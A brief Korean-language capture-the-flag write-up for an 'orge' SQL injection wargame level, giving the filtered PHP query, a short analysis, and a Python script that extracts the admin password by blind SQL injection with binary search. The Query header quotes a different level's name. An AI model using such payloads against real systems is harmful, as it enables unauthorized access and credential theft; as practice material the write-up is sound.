Query
1
select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'
Protection
preg_match
prob문자열_.()- ` ` (white space)
addslashes()
1
$_GET[pw] = addslashes($_GET[pw]);
Analysis
- orc 문제와 같이 blind sql injection이 가능
or대신||연산자를 사용하고,and대신&&를 사용해야하나&를 query string으로 인식하기에 인코딩하여%26으로 사용
Exploit code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
cookie = '39je4ges6g212tfsms39bnhqk5'
# Get the length of the password
length = 1
while True:
payload = f"?pw=' || id='admin' %26%26 length(pw)={length} %23 "
res = requests.get(url=f'{url}{payload}', cookies={'PHPSESSID': cookie})
if '<h2>Hello admin</h2>' in res.text:
break
length += 1
print(f'*** Found length: {length} ***')
# Get the password by binary search
password = ''
for i in range(1, length + 1):
low = ord('0')
high = ord('z')
while low <= high:
mid = (low + high) // 2
payload = f"?pw=' || id='admin' %26%26 ascii(substring(pw,{i},1))<={mid} %23 "
res = requests.get(url=f'{url}{payload}', cookies={'PHPSESSID': cookie})
if '<h2>Hello admin</h2>' in res.text:
high = mid - 1
else:
low = mid + 1
password += chr(low)
print(f'Current password: {password}')
print(f'*** Found Password: {password} ***')